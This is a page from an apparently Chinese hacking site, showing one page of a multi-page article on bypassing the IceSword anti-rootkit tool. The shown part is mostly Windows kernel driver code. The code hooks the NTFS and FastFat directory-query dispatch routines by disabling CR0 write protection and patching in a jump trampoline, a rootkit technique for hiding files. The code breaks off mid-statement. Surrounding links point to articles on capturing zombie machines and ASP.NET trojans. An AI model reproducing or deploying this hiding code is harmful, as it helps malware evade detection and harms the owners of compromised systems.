推荐:利用伪造内核文件来绕过IceSword的检测

通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码

电信 ┊ 网通 ┊ 铁通 ┊ 移动　

在线人

文章搜索：

热门搜索：红客黑鹰红客技术安全动画红客培训

　业内新闻漏洞公告病毒公告电脑知识网络知识菜鸟入门攻防教程黑客攻防安全编程工具使用综合安全个人安全安全相关 Q Q安全原创精华红客人物站内事件

您现在的位置：爱国者安全网 >> 文章类 >> 原创精华 >> 文章正文

推荐:利用伪造内核文件来绕过IceSword的检测

责任编辑：古典辣M° 　更新日期：2005-12-22

                _asm
                {
                    pushad
                    mov edi, OldFatQueryDirectoryDispatch
                    mov eax, dword ptr CrackCodeFatQueryDirectoryDispatch[0]
                    mov [edi], eax
                    mov ax, word ptr CrackCodeFatQueryDirectoryDispatch[4]
                    mov [edi+4], ax
                    popad
                }
                return Status;
}

NTSTATUS PatchFileSystemDevicePatDispatch()
{
    NTSTATUS NtfsStatus;
    NTSTATUS FastFatStatus;
    UNICODE_STRING FileSystemName;
    PVOID FileDeviceObject;
    POBJECT_TYPE ObjectType;

        DbgPrint("My Driver Loaded!");

RtlInitUnicodeString( &FileSystemName, L"\\FileSystem\\Ntfs" );

        NtfsStatus = ObReferenceObjectByName (
                                &FileSystemName,
                                0x40,
                                NULL,
                                NULL,
                                &ObjectType,
                                NULL,
                                NULL,
                                &FileDeviceObject );
        if ( NtfsStatus == STATUS_SUCCESS )
        {

            _asm
        {
            pushad
            mov edi, FileDeviceObject
            mov eax, [edi+0x68]
            mov OldNtfsQueryDirectoryDispatch, eax
            popad
        }

            _asm
        {
            CLI
            MOV    EAX, CR0
            AND EAX, NOT 10000H
            MOV    CR0, EAX
        }

              _asm
        {
            pushad
            mov edi, OldNtfsQueryDirectoryDispatch
            mov eax, [edi]
            mov dword ptr ResumCodeNtfsQueryDirectoryDispatch[0], eax
            mov ax, [edi+4]
            mov word ptr ResumCodeNtfsQueryDirectoryDispatch[4], ax

            mov byte ptr CrackCodeNtfsQueryDirectoryDispatch[0], 0x68
            lea edi, NewNtfsQueryDirectoryDispatch
            mov dword ptr CrackCodeNtfsQueryDirectoryDispatch[1], edi
            mov byte ptr CrackCodeNtfsQueryDirectoryDispatch[5], 0xC3

            mov edi, OldNtfsQueryDirectoryDispatch
            mov eax, dword ptr CrackCodeNtfsQueryDirectoryDispatch[0]
            mov dword ptr[edi], eax
            mov ax, word ptr CrackCodeNtfsQueryDirectoryDispatch[4]
            mov word ptr[edi+4], ax
            popad
        }

            _asm
        {
            MOV    EAX, CR0
            OR    EAX, 10000H
            MOV    CR0, EAX
            STI
        }
        }

RtlInitUnicodeString( &FileSystemName, L"\\FileSystem\\Fastfat" );

        FastFatStatus = ObReferenceObjectByName (
                                &FileSystemName,
                                0x40,
                                NULL,
                                NULL,
                                &ObjectType,
                                NULL,
                                NULL,
                       &n

<< 上一页 [11] [12] [13] [14] [15] [16] [17] 下一页

上一篇文章：黑冰之校园捡肉鸡版

下一篇文章：解析Asp.net木马文件操作